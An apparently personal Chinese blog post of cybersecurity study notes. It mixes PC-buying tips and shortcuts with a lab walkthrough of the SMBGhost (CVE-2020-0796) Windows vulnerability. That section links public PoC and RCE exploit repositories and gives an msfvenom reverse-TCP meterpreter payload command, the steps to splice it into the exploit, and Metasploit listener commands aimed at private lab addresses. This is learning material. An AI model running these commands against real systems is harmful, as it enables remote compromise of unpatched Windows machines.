<!DOCTYPE HTML>
<html lang="zh-CN">


<head>
    <meta charset="utf-8">
    <meta name="referrer" content="no-referrer" />
    <meta name="keywords" content="hi,github">
    <meta name="description" content="">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
    <meta name="renderer" content="webkit|ie-stand|ie-comp">
    <meta name="mobile-web-app-capable" content="yes">
    <meta name="format-detection" content="telephone=no">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <!-- Global site tag (gtag.js) - Google Analytics -->


    <title>美女大本营</title>
    <link rel="icon" type="image/png" href="/favicon.png">

    <link rel="stylesheet" type="text/css" href="/libs/awesome/css/all.css">
    <link rel="stylesheet" type="text/css" href="/libs/materialize/materialize.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/aos/aos.css">
    <link rel="stylesheet" type="text/css" href="/libs/animate/animate.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/lightGallery/css/lightgallery.min.css">
    <link rel="stylesheet" type="text/css" href="/css/matery.css">
    <link rel="stylesheet" type="text/css" href="/css/my.css">

    <script src="/libs/jquery/jquery.min.js"></script>

<meta name="generator" content="Hexo 7.3.0"></head>




<body>
    <header class="navbar-fixed">
    <nav id="headNav" class="bg-color nav-transparent">
        <div id="navContainer" class="nav-wrapper container">
            <div class="brand-logo">
                <a href="/" class="waves-effect waves-light">
                    
                    <img src="/medias/logo.png" class="logo-img" alt="LOGO">
                    
                    <span class="logo-span">美女大本营</span>
                </a>
            </div>
            

<a href="#" data-target="mobile-nav" class="sidenav-trigger button-collapse"><i class="fas fa-bars"></i></a>
<ul class="right nav-menu">
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/" class="waves-effect waves-light">
      
      <i class="fas fa-home" style="zoom: 0.6;"></i>
      
      <span>首页</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/tags" class="waves-effect waves-light">
      
      <i class="fas fa-tags" style="zoom: 0.6;"></i>
      
      <span>标签</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/categories" class="waves-effect waves-light">
      
      <i class="fas fa-bookmark" style="zoom: 0.6;"></i>
      
      <span>分类</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/archives" class="waves-effect waves-light">
      
      <i class="fas fa-archive" style="zoom: 0.6;"></i>
      
      <span>归档</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/about" class="waves-effect waves-light">
      
      <i class="fas fa-user-circle" style="zoom: 0.6;"></i>
      
      <span>关于</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/contact" class="waves-effect waves-light">
      
      <i class="fas fa-comments" style="zoom: 0.6;"></i>
      
      <span>留言板</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/friends" class="waves-effect waves-light">
      
      <i class="fas fa-address-book" style="zoom: 0.6;"></i>
      
      <span>友情链接</span>
    </a>
    
  </li>
  
  <li>
    <a href="#searchModal" class="modal-trigger waves-effect waves-light">
      <i id="searchIcon" class="fas fa-search" title="搜索" style="zoom: 0.85;"></i>
    </a>
  </li>
</ul>


<div id="mobile-nav" class="side-nav sidenav">

    <div class="mobile-head bg-color">
        
        <img src="/medias/logo.png" class="logo-img circle responsive-img">
        
        <div class="logo-name">美女大本营</div>
        <div class="logo-desc">
            
            Never really desperate, only the lost of the soul.
            
        </div>
    </div>

    

    <ul class="menu-list mobile-menu-list">
        
        <li class="m-nav-item">
	  
		<a href="/" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-home"></i>
			
			首页
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/tags" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-tags"></i>
			
			标签
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/categories" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-bookmark"></i>
			
			分类
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/archives" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-archive"></i>
			
			归档
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/about" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-user-circle"></i>
			
			关于
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/contact" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-comments"></i>
			
			留言板
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/friends" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-address-book"></i>
			
			友情链接
		</a>
          
        </li>
        
        
        <li><div class="divider"></div></li>
        <li>
            <a href="https://github.com/blinkfox/hexo-theme-matery" class="waves-effect waves-light" target="_blank">
                <i class="fab fa-github-square fa-fw"></i>Fork Me
            </a>
        </li>
        
    </ul>
</div>


        </div>

        
            <style>
    .nav-transparent .github-corner {
        display: none !important;
    }

    .github-corner {
        position: absolute;
        z-index: 10;
        top: 0;
        right: 0;
        border: 0;
        transform: scale(1.1);
    }

    .github-corner svg {
        color: #0f9d58;
        fill: #fff;
        height: 64px;
        width: 64px;
    }

    .github-corner:hover .octo-arm {
        animation: a 0.56s ease-in-out;
    }

    .github-corner .octo-arm {
        animation: none;
    }

    @keyframes a {
        0%,
        to {
            transform: rotate(0);
        }
        20%,
        60% {
            transform: rotate(-25deg);
        }
        40%,
        80% {
            transform: rotate(10deg);
        }
    }
</style>

<a href="https://github.com/blinkfox/hexo-theme-matery" class="github-corner tooltipped hide-on-med-and-down" target="_blank"
   data-tooltip="Fork Me" data-position="left" data-delay="50">
    <svg viewBox="0 0 250 250" aria-hidden="true">
        <path d="M0,0 L115,115 L130,115 L142,142 L250,250 L250,0 Z"></path>
        <path d="M128.3,109.0 C113.8,99.7 119.0,89.6 119.0,89.6 C122.0,82.7 120.5,78.6 120.5,78.6 C119.2,72.0 123.4,76.3 123.4,76.3 C127.3,80.9 125.5,87.3 125.5,87.3 C122.9,97.6 130.6,101.9 134.4,103.2"
              fill="currentColor" style="transform-origin: 130px 106px;" class="octo-arm"></path>
        <path d="M115.0,115.0 C114.9,115.1 118.7,116.5 119.8,115.4 L133.7,101.6 C136.9,99.2 139.9,98.4 142.2,98.6 C133.8,88.0 127.5,74.4 143.8,58.0 C148.5,53.4 154.0,51.2 159.7,51.0 C160.3,49.4 163.2,43.6 171.4,40.1 C171.4,40.1 176.1,42.5 178.8,56.2 C183.1,58.6 187.2,61.8 190.9,65.4 C194.5,69.0 197.7,73.2 200.1,77.6 C213.8,80.2 216.3,84.9 216.3,84.9 C212.7,93.1 206.9,96.0 205.4,96.6 C205.1,102.4 203.0,107.8 198.3,112.5 C181.9,128.9 168.3,122.5 157.7,114.1 C157.9,116.9 156.7,120.9 152.7,124.9 L141.0,136.5 C139.8,137.7 141.6,141.9 141.8,141.8 Z"
              fill="currentColor" class="octo-body"></path>
    </svg>
</a>
        
    </nav>

</header>

    



<div class="bg-cover pd-header post-cover" style="background-image: url('/medias/featureimages/0.jpg')">
    <div class="container" style="right: 0px;left: 0px;">
        <div class="row">
            <div class="col s12 m12 l12">
                <div class="brand">
                    <h1 class="description center-align post-title"></h1>
                </div>
            </div>
        </div>
    </div>
</div>




<main class="post-container content">

    
    <link rel="stylesheet" href="/libs/tocbot/tocbot.css">
<style>
    #articleContent h1::before,
    #articleContent h2::before,
    #articleContent h3::before,
    #articleContent h4::before,
    #articleContent h5::before,
    #articleContent h6::before {
        display: block;
        content: " ";
        height: 100px;
        margin-top: -100px;
        visibility: hidden;
    }

    #articleContent :focus {
        outline: none;
    }

    .toc-fixed {
        position: fixed;
        top: 64px;
    }

    .toc-widget {
        width: 345px;
        padding-left: 20px;
    }

    .toc-widget .toc-title {
        padding: 35px 0 15px 17px;
        font-size: 1.5rem;
        font-weight: bold;
        line-height: 1.5rem;
    }

    .toc-widget ol {
        padding: 0;
        list-style: none;
    }

    #toc-content {
        padding-bottom: 30px;
        overflow: auto;
    }

    #toc-content ol {
        padding-left: 10px;
    }

    #toc-content ol li {
        padding-left: 10px;
    }

    #toc-content .toc-link:hover {
        color: #42b983;
        font-weight: 700;
        text-decoration: underline;
    }

    #toc-content .toc-link::before {
        background-color: transparent;
        max-height: 25px;

        position: absolute;
        right: 23.5vw;
        display: block;
    }

    #toc-content .is-active-link {
        color: #42b983;
    }

    #floating-toc-btn {
        position: fixed;
        right: 15px;
        bottom: 76px;
        padding-top: 15px;
        margin-bottom: 0;
        z-index: 998;
    }

    #floating-toc-btn .btn-floating {
        width: 48px;
        height: 48px;
    }

    #floating-toc-btn .btn-floating i {
        line-height: 48px;
        font-size: 1.4rem;
    }
</style>
<div class="row">
    <div id="main-content" class="col s12 m12 l9">
        <!-- 文章内容详情 -->
<div id="artDetail">
    <div class="card">
        <div class="card-content article-info">
            <div class="row tag-cate">
                <div class="col s7">
                    
                          <div class="article-tag">
                            <span class="chip bg-color">无标签</span>
                          </div>
                    
                </div>
                <div class="col s5 right-align">
                    
                </div>
            </div>

            <div class="post-info">
                
                <div class="post-date info-break-policy">
                    <i class="far fa-calendar-minus fa-fw"></i>发布日期:&nbsp;&nbsp;
                    2024-07-11
                </div>
                

                

                

                

                
            </div>
        </div>
        <hr class="clearfix">

        

        

        <div class="card-content article-card-content">
            <div id="articleContent">
                <h1 id="2-电脑选择，系统版本，永恒之黑"><a href="#2-电脑选择，系统版本，永恒之黑" class="headerlink" title="2 电脑选择，系统版本，永恒之黑"></a>2 电脑选择，系统版本，永恒之黑</h1><h1 id="1-电脑选择，系统版本"><a href="#1-电脑选择，系统版本" class="headerlink" title="1.电脑选择，系统版本"></a>1.电脑选择，系统版本</h1><p>同样的价格台式机只用花6k就可以得到笔记本1w的配置<br>CPU：链接<a target="_blank" rel="noopener" href="https://www.mydrivers.com/zhuanti/tianti/cpu/">https://www.mydrivers.com/zhuanti/tianti/cpu/</a><br><img src="https://cdn.nlark.com/yuque/0/2024/png/46258332/1720523563582-78363761-fb10-4171-92df-a07cc97fc1f0.png#averageHue=%239eb9d4&clientId=uba784b65-526f-4&from=paste&height=527&id=u3a53a324&originHeight=659&originWidth=1892&originalType=binary&ratio=1.25&rotation=0&showTitle=false&size=335631&status=done&style=none&taskId=u8ad37b48-a932-4331-bf55-1f6f0c958e4&title=&width=1513.6" alt="image.png"><br>显卡：百度搜显卡天梯图（目前4090最好）<br>硬盘同理搜索<br>内存分为8g,16g,32g等<br><img src="https://cdn.nlark.com/yuque/0/2024/png/46258332/1720489230889-a287a226-2373-4227-a6f8-6d0051667927.png#averageHue=%23364047&clientId=u93cad80c-b735-4&from=paste&height=568&id=u7a612e6f&originHeight=710&originWidth=1568&originalType=binary&ratio=1.25&rotation=0&showTitle=false&size=212437&status=done&style=none&taskId=u5afc3b39-d789-4598-a2c9-76b3a2b63f1&title=&width=1254.4" alt="image.png"></p>
<h1 id="2-硬件、驱动、系统、用户的关系"><a href="#2-硬件、驱动、系统、用户的关系" class="headerlink" title="2.硬件、驱动、系统、用户的关系"></a>2.硬件、驱动、系统、用户的关系</h1><p>用户利用系统通过驱动控制硬件，系统通过驱动控制硬件<br><img src="https://cdn.nlark.com/yuque/0/2024/png/46258332/1720491899800-67577cb0-f667-43bb-8ef5-0b41e79b823c.png#averageHue=%233c454d&clientId=u37fd5071-a966-4&from=paste&height=79&id=u02de017b&originHeight=99&originWidth=551&originalType=binary&ratio=1.25&rotation=0&showTitle=false&size=18276&status=done&style=none&taskId=uf5ba1aa1-6331-4fce-82a6-b345da40ae7&title=&width=440.8" alt="image.png"></p>
<h1 id="3-windows系统版本及对标服务器版本"><a href="#3-windows系统版本及对标服务器版本" class="headerlink" title="3.windows系统版本及对标服务器版本"></a>3.windows系统版本及对标服务器版本</h1><p><img src="https://cdn.nlark.com/yuque/0/2024/png/46258332/1720492075688-ed040369-0b2f-4204-8e34-9b56833940d7.png#averageHue=%233a444b&clientId=u37fd5071-a966-4&from=paste&height=187&id=u3fe92a77&originHeight=234&originWidth=1325&originalType=binary&ratio=1.25&rotation=0&showTitle=false&size=85827&status=done&style=none&taskId=u2432f73d-98a0-4bfb-b97a-35396701ecd&title=&width=1060" alt="image.png"></p>
<h1 id="4-apt（Advanced-Persistent-Threat-APT"><a href="#4-apt（Advanced-Persistent-Threat-APT" class="headerlink" title="4.apt（Advanced Persistent Threat,APT)"></a>4.apt（Advanced Persistent Threat,APT)</h1><p>链接<a target="_blank" rel="noopener" href="https://upimg.baike.so.com/doc/4559664-24906420.html">https://upimg.baike.so.com/doc/4559664-24906420.html</a><br><img src="https://cdn.nlark.com/yuque/0/2024/png/46258332/1720522460991-a07b2762-4dc5-42a3-8c4d-5a7543064869.png#averageHue=%23e5e5e5&clientId=u329393d2-4abb-4&from=paste&height=133&id=u4e2628a1&originHeight=166&originWidth=1031&originalType=binary&ratio=1.25&rotation=0&showTitle=false&size=48261&status=done&style=none&taskId=uea2c4ef9-bf71-48e3-9b4d-7203f6a8ee4&title=&width=824.8" alt="image.png"></p>
<h1 id="5-网安方向和薪资"><a href="#5-网安方向和薪资" class="headerlink" title="5.网安方向和薪资"></a>5.网安方向和薪资</h1><p><img src="https://cdn.nlark.com/yuque/0/2024/png/46258332/1720494178277-b8bb1e10-e4bd-4151-ade5-8eda7b2a815e.png#averageHue=%23374148&clientId=u37fd5071-a966-4&from=paste&height=387&id=uef30b5bf&originHeight=484&originWidth=1607&originalType=binary&ratio=1.25&rotation=0&showTitle=false&size=183211&status=done&style=none&taskId=u56213054-b4f8-4761-9116-a8dd1236d2a&title=&width=1285.6" alt="image.png"><br>赛棍是经常参加 CTF 大赛的选手,此称呼,纯属调侃。 </p>
<h1 id="6-一些电脑快捷键"><a href="#6-一些电脑快捷键" class="headerlink" title="6.一些电脑快捷键"></a>6.一些电脑快捷键</h1><p>ctrl+alt+f截图翻译（qq）<br>快速锁屏win+l<br>剪切板win+v<br>qq截图ctrl+alt+a<br>vx截图alt+a<br>系统自带截图win+shift+s<br>把截图钉在桌面上（仅限QQ）ctrl+alt+a</p>
<h1 id="7-语雀快速应用几级标题"><a href="#7-语雀快速应用几级标题" class="headerlink" title="7.语雀快速应用几级标题"></a>7.语雀快速应用几级标题</h1><p>敲# 是一级标题，## 是二级标题，以此类推</p>
<h1 id="8-永恒之黑漏洞："><a href="#8-永恒之黑漏洞：" class="headerlink" title="8.永恒之黑漏洞："></a>8.永恒之黑漏洞：</h1><h2 id="1-poc（观点验证脚本，证明漏洞，危害性不大）（蓝屏）"><a href="#1-poc（观点验证脚本，证明漏洞，危害性不大）（蓝屏）" class="headerlink" title="1.poc（观点验证脚本，证明漏洞，危害性不大）（蓝屏）"></a>1.poc（观点验证脚本，证明漏洞，危害性不大）（蓝屏）</h2><h3 id="（1）在github上下载源文件"><a href="#（1）在github上下载源文件" class="headerlink" title="（1）在github上下载源文件"></a>（1）在github上下载源文件</h3><p><a target="_blank" rel="noopener" href="https://github.com/eerykitty/CVE-2020-0796-PoC"><strong>https://github.com/eerykitty/CVE-2020-0796-PoC</strong></a></p>
<h3 id="（2）点击code，下载zip"><a href="#（2）点击code，下载zip" class="headerlink" title="（2）点击code，下载zip"></a>（2）点击code，下载zip</h3><p><img src="https://cdn.nlark.com/yuque/0/2024/png/46258332/1720497533895-7e5d4eb8-f7ae-42ee-9b57-cbeaf8dbd0c7.png#averageHue=%2333904c&clientId=u37fd5071-a966-4&from=paste&height=332&id=ufc1084d1&originHeight=415&originWidth=917&originalType=binary&ratio=1.25&rotation=0&showTitle=false&size=60585&status=done&style=none&taskId=ua488e5b1-970d-459a-8a64-58453f04e2f&title=&width=733.6" alt="image.png"><br>注：kali地址：192.168.248.128（使用ifconfig命令查看）<br>靶机win10地址：192.168.248.130（使用ipconfig命令查看）<br>靶机要提前将安全中心里的病毒威胁和防火墙关闭</p>
<h3 id="（3）关键步骤"><a href="#（3）关键步骤" class="headerlink" title="（3）关键步骤"></a>（3）关键步骤</h3><p>将解压后的文件复制到kali里面，打开文件所在位置，右键在此处打开终端，使用<br>pip install ntlm_auth命令，再使用<br>python CVE-2020-0796.py 192.168.248.130（靶机ip）（用python执行这个py脚本文件，并将其地址参数传递给靶机）<br><img src="https://cdn.nlark.com/yuque/0/2024/png/46258332/1720497355462-fad3db3a-322a-44cc-8911-b81893e7f1f1.png#averageHue=%232f313b&clientId=u37fd5071-a966-4&from=paste&height=110&id=ua2998e70&originHeight=137&originWidth=1256&originalType=binary&ratio=1.25&rotation=0&showTitle=false&size=47249&status=done&style=none&taskId=ucd8b429c-69b8-4009-aad2-9e541d68a30&title=&width=1004.8" alt="image.png"></p>
<h3 id="（4）执行完成后靶机蓝屏"><a href="#（4）执行完成后靶机蓝屏" class="headerlink" title="（4）执行完成后靶机蓝屏"></a>（4）执行完成后靶机蓝屏</h3><p><img src="https://cdn.nlark.com/yuque/0/2024/png/46258332/1720497270706-ea15ff6f-08cf-4a36-9fd3-93711836721c.png#averageHue=%231080d8&clientId=u37fd5071-a966-4&from=paste&height=486&id=uadc47eed&originHeight=608&originWidth=893&originalType=binary&ratio=1.25&rotation=0&showTitle=false&size=50196&status=done&style=none&taskId=u72869f1f-9884-48d2-a74a-a07a3ea8d00&title=&width=714.4" alt="image.png"></p>
<h1 id="2-exp-RCE-（漏洞利用脚本，能武器化）"><a href="#2-exp-RCE-（漏洞利用脚本，能武器化）" class="headerlink" title="2.exp(RCE)（漏洞利用脚本，能武器化）"></a>2.exp(RCE)（漏洞利用脚本，能武器化）</h1><h2 id="（1）在github上下载源文件-1"><a href="#（1）在github上下载源文件-1" class="headerlink" title="（1）在github上下载源文件"></a>（1）在github上下载源文件</h2><p><a target="_blank" rel="noopener" href="https://github.com/chompie1337/SMBGhost_RCE_PoC">https://github.com/chompie1337/SMBGhost_RCE_PoC</a></p>
<h2 id="（2）点击code，下载zip-1"><a href="#（2）点击code，下载zip-1" class="headerlink" title="（2）点击code，下载zip"></a>（2）点击code，下载zip</h2><p><img src="https://cdn.nlark.com/yuque/0/2024/png/46258332/1720507630419-fc8ad210-f22a-4bfd-bd59-0838c46a825e.png#averageHue=%23e2eac5&clientId=u61dac070-ee99-4&from=paste&height=277&id=u13e70d4e&originHeight=346&originWidth=934&originalType=binary&ratio=1.25&rotation=0&showTitle=false&size=48164&status=done&style=none&taskId=u802da916-d7d9-4d0c-98fb-c9429ac01d3&title=&width=747.2" alt="image.png"><br>注：kali地址：192.168.248.128（使用ifconfig命令查看）<br>靶机win10地址：192.168.248.132（使用ipconfig命令查看）</p>
<h2 id="（3）将解压后的源文件复制到kali，打开文件所在位置，右键在此处打开终端"><a href="#（3）将解压后的源文件复制到kali，打开文件所在位置，右键在此处打开终端" class="headerlink" title="（3）将解压后的源文件复制到kali，打开文件所在位置，右键在此处打开终端"></a>（3）将解压后的源文件复制到kali，打开文件所在位置，右键在此处打开终端</h2><h2 id="（4）在kali中利用MSF生成木马："><a href="#（4）在kali中利用MSF生成木马：" class="headerlink" title="（4）在kali中利用MSF生成木马："></a>（4）在kali中利用MSF生成木马：</h2><p>msfvenom -p windows&#x2F;x64&#x2F;meterpreter&#x2F;reverse_tcp LHOST&#x3D;192.168.248.128  LPORT&#x3D;5555 -b ‘\x00’ -i 5 -f python &gt; exploit<br>解释：（生成木马，反弹windows64位系统的meterpreter的反向tcp连接（从靶机到攻击机建立tcp连接）载荷权限到lhost(kali的ip)的5555端口，<br>lhost是Listener Host（本地端口）的意思，<br>-b ‘\x00’是因为某些程序或协议不允许空字节出现在特定的数据字段中，<br>-f python是指生成的载荷将是一个 Python 脚本，</p>
<blockquote>
<p>exploit是将 msfvenom 命令的输出重定向到一个名为 exploit 的文件中</p>
</blockquote>
<p><img src="https://cdn.nlark.com/yuque/0/2024/png/46258332/1720508336200-1cddfe09-4aa0-4ca0-a2e3-87ab4117f616.png#averageHue=%23fafafa&clientId=uc5165aa1-d9cd-4&from=paste&height=268&id=ud39dfea3&originHeight=335&originWidth=475&originalType=binary&ratio=1.25&rotation=0&showTitle=false&size=19604&status=done&style=none&taskId=u20d2a285-5984-4aae-9c70-d214e245d12&title=&width=380" alt="image.png"></p>
<h2 id="5-配置命令"><a href="#5-配置命令" class="headerlink" title="5.配置命令"></a>5.配置命令</h2><p>vi exploit或者vim exploit<br>:%s&#x2F;buf&#x2F;USER_PAYLOAD（将生成的exploit文件中的 buf 替换为 USER_PAYLOAD）<br>:wq</p>
<h2 id="6-将工具中-exploit-py中的USER-PAYLOAD部分替换成exploit文件中的内容"><a href="#6-将工具中-exploit-py中的USER-PAYLOAD部分替换成exploit文件中的内容" class="headerlink" title="6.将工具中 exploit.py中的USER_PAYLOAD部分替换成exploit文件中的内容"></a>6.将工具中 exploit.py中的USER_PAYLOAD部分替换成exploit文件中的内容</h2><h2 id="7-监听"><a href="#7-监听" class="headerlink" title="7.监听"></a>7.监听</h2><p>msfconsole<br>use exploit&#x2F;multi&#x2F;handler<br>set payload windows&#x2F;x64&#x2F;meterpreter&#x2F;reverse_tcp<br>set lhost 192.168.248.128<br>set lport 5555<br>run</p>
<h2 id="8-运行刚修改好的-exploit-py-文件"><a href="#8-运行刚修改好的-exploit-py-文件" class="headerlink" title="8.运行刚修改好的 exploit.py 文件"></a>8.运行刚修改好的 exploit.py 文件</h2><p>python3 exploit.py -ip 192.168.248.132（靶机ip）</p>
<h2 id="9-这里试了很多次，没成功运行，msf监听的端口也没成功反弹shell（最后是能做成功的，成功几率小）"><a href="#9-这里试了很多次，没成功运行，msf监听的端口也没成功反弹shell（最后是能做成功的，成功几率小）" class="headerlink" title="9.这里试了很多次，没成功运行，msf监听的端口也没成功反弹shell（最后是能做成功的，成功几率小）"></a>9.这里试了很多次，没成功运行，msf监听的端口也没成功反弹shell（最后是能做成功的，成功几率小）</h2><p><img src="https://cdn.nlark.com/yuque/0/2024/png/46258332/1720522117075-ef1b2b52-82c8-461e-b2e6-3c1cd36ebba0.png#averageHue=%23393a45&clientId=u335d393d-3f07-4&from=paste&height=680&id=uaa6a6441&originHeight=850&originWidth=1172&originalType=binary&ratio=1.25&rotation=0&showTitle=false&size=321933&status=done&style=none&taskId=ub3192ef4-8095-49b1-9807-77ec22c311d&title=&width=937.6" alt="image.png"><br>，<img src="https://cdn.nlark.com/yuque/0/2024/png/46258332/1720507354265-b966da36-2b8a-4130-9d5d-fcc4da252e8d.png#averageHue=%231281d8&clientId=u61dac070-ee99-4&from=paste&height=455&id=uf05be6cf&originHeight=569&originWidth=651&originalType=binary&ratio=1.25&rotation=0&showTitle=false&size=46848&status=done&style=none&taskId=u23c88513-b731-4068-8439-bc5152c9756&title=&width=520.8" alt="image.png"></p>

                
            </div>
            <hr/>

            

    <div class="reprint" id="reprint-statement">
        
            <div class="reprint__author">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-user">
                        文章作者:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="/about" rel="external nofollow noreferrer">Catalina Smith</a>
                </span>
            </div>
            <div class="reprint__type">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-link">
                        文章链接:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="http://catalina475.github.io/2024/07/11/2-dian-nao-xuan-ze-xi-tong-ban-ben-yong-heng-zhi-hei/">http://catalina475.github.io/2024/07/11/2-dian-nao-xuan-ze-xi-tong-ban-ben-yong-heng-zhi-hei/</a>
                </span>
            </div>
            <div class="reprint__notice">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-copyright">
                        版权声明:
                    </i>
                </span>
                <span class="reprint-info">
                    本博客所有文章除特別声明外，均采用
                    <a href="https://creativecommons.org/licenses/by/4.0/deed.zh" rel="external nofollow noreferrer" target="_blank">CC BY 4.0</a>
                    许可协议。转载请注明来源
                    <a href="/about" target="_blank">Catalina Smith</a>
                    !
                </span>
            </div>
        
    </div>

    <script async defer>
      document.addEventListener("copy", function (e) {
        let toastHTML = '<span>复制成功，请遵循本文的转载规则</span><button class="btn-flat toast-action" onclick="navToReprintStatement()" style="font-size: smaller">查看</a>';
        M.toast({html: toastHTML})
      });

      function navToReprintStatement() {
        $("html, body").animate({scrollTop: $("#reprint-statement").offset().top - 80}, 800);
      }
    </script>



            <div class="tag_share" style="display: block;">
                <div class="post-meta__tag-list" style="display: inline-block;">
                    
                        <div class="article-tag">
                            <span class="chip bg-color">无标签</span>
                        </div>
                    
                </div>
                <div class="post_share" style="zoom: 80%; width: fit-content; display: inline-block; float: right; margin: -0.15rem 0;">
                    <link rel="stylesheet" type="text/css" href="/libs/share/css/share.min.css">
<div id="article-share">

    
    <div class="social-share" data-sites="twitter,facebook,google,qq,qzone,wechat,weibo,douban,linkedin" data-wechat-qrcode-helper="<p>微信扫一扫即可分享！</p>"></div>
    <script src="/libs/share/js/social-share.min.js"></script>
    

    

</div>

                </div>
            </div>
            
                <style>
    #reward {
        margin: 40px 0;
        text-align: center;
    }

    #reward .reward-link {
        font-size: 1.4rem;
        line-height: 38px;
    }

    #reward .btn-floating:hover {
        box-shadow: 0 6px 12px rgba(0, 0, 0, 0.2), 0 5px 15px rgba(0, 0, 0, 0.2);
    }

    #rewardModal {
        width: 320px;
        height: 350px;
    }

    #rewardModal .reward-title {
        margin: 15px auto;
        padding-bottom: 5px;
    }

    #rewardModal .modal-content {
        padding: 10px;
    }

    #rewardModal .close {
        position: absolute;
        right: 15px;
        top: 15px;
        color: rgba(0, 0, 0, 0.5);
        font-size: 1.3rem;
        line-height: 20px;
        cursor: pointer;
    }

    #rewardModal .close:hover {
        color: #ef5350;
        transform: scale(1.3);
        -moz-transform:scale(1.3);
        -webkit-transform:scale(1.3);
        -o-transform:scale(1.3);
    }

    #rewardModal .reward-tabs {
        margin: 0 auto;
        width: 210px;
    }

    .reward-tabs .tabs {
        height: 38px;
        margin: 10px auto;
        padding-left: 0;
    }

    .reward-content ul {
        padding-left: 0 !important;
    }

    .reward-tabs .tabs .tab {
        height: 38px;
        line-height: 38px;
    }

    .reward-tabs .tab a {
        color: #fff;
        background-color: #ccc;
    }

    .reward-tabs .tab a:hover {
        background-color: #ccc;
        color: #fff;
    }

    .reward-tabs .wechat-tab .active {
        color: #fff !important;
        background-color: #22AB38 !important;
    }

    .reward-tabs .alipay-tab .active {
        color: #fff !important;
        background-color: #019FE8 !important;
    }

    .reward-tabs .reward-img {
        width: 210px;
        height: 210px;
    }
</style>

<div id="reward">
    <a href="#rewardModal" class="reward-link modal-trigger btn-floating btn-medium waves-effect waves-light red">赏</a>

    <!-- Modal Structure -->
    <div id="rewardModal" class="modal">
        <div class="modal-content">
            <a class="close modal-close"><i class="fas fa-times"></i></a>
            <h4 class="reward-title">你的赏识是我前进的动力</h4>
            <div class="reward-content">
                <div class="reward-tabs">
                    <ul class="tabs row">
                        <li class="tab col s6 alipay-tab waves-effect waves-light"><a href="#alipay">支付宝</a></li>
                        <li class="tab col s6 wechat-tab waves-effect waves-light"><a href="#wechat">微 信</a></li>
                    </ul>
                    <div id="alipay">
                        <img src="/medias/reward/alipay.jpg" class="reward-img" alt="支付宝打赏二维码">
                    </div>
                    <div id="wechat">
                        <img src="/medias/reward/wechat.png" class="reward-img" alt="微信打赏二维码">
                    </div>
                </div>
            </div>
        </div>
    </div>
</div>

<script>
    $(function () {
        $('.tabs').tabs();
    });
</script>

            
        </div>
    </div>

    

    

    

    

    

    

    

    

<article id="prenext-posts" class="prev-next articles">
    <div class="row article-row">
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge left-badge text-color">
                <i class="fas fa-chevron-left"></i>&nbsp;上一篇</div>
            <div class="card">
                <a href="/2024/07/11/4-bo-ke-shang-chuan-tu-pian-diao-yu-mu-ma-she-gong-ku/">
                    <div class="card-image">
                        
                        
                        <img src="/medias/featureimages/0.jpg" class="responsive-img" alt="">
                        
                        <span class="card-title"></span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            
                        
                    </div>
                    <div class="publish-info">
                        <span class="publish-date">
                            <i class="far fa-clock fa-fw icon-date"></i>2024-07-11
                        </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-user fa-fw"></i>
                            Catalina Smith
                            
                        </span>
                    </div>
                </div>
                
            </div>
        </div>
        
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge right-badge text-color">
                下一篇&nbsp;<i class="fas fa-chevron-right"></i>
            </div>
            <div class="card">
                <a href="/2024/07/10/hello-world/">
                    <div class="card-image">
                        
                        
                        <img src="/medias/featureimages/12.jpg" class="responsive-img" alt="Hello World">
                        
                        <span class="card-title">Hello World</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            
                        
                    </div>
                    <div class="publish-info">
                            <span class="publish-date">
                                <i class="far fa-clock fa-fw icon-date"></i>2024-07-10
                            </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-user fa-fw"></i>
                            Catalina Smith
                            
                        </span>
                    </div>
                </div>
                
            </div>
        </div>
        
    </div>
</article>

</div>



<!-- 代码块功能依赖 -->
<script type="text/javascript" src="/libs/codeBlock/codeBlockFuction.js"></script>

<!-- 代码语言 -->

<script type="text/javascript" src="/libs/codeBlock/codeLang.js"></script>


<!-- 代码块复制 -->

<script type="text/javascript" src="/libs/codeBlock/codeCopy.js"></script>


<!-- 代码块收缩 -->

<script type="text/javascript" src="/libs/codeBlock/codeShrink.js"></script>


    </div>
    <div id="toc-aside" class="expanded col l3 hide-on-med-and-down">
        <div class="toc-widget card" style="background-color: white;">
